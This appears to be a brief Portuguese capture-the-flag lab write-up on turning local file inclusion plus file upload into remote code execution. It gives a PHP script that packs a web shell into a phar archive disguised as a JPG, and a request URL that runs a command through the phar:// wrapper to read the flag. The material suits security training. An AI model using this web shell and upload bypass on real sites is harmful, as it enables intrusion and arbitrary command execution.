LFI & Uploads - 1

1. Use qualquer uma das técnicas abordadas nesta seção para obter RCE e ler a bandeira em /

• Vamos usar o wrapper phar para o nosso shell

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();

• Este script pode ser compilado em um phararquivo que, quando chamado, escreveria um web shell em um shell.txtsubarquivo, com o qual podemos interagir. Podemos compilá-lo em um phararquivo e renomeá-lo shell.jpgcomo segue:

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

• Depois de fazer upload dele para o aplicativo web, podemos simplesmente chamá-lo com phar://

http://83.136.252.57:41810/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=cat%20/2f40d853e2d4768d87da1c81772bae0a.txt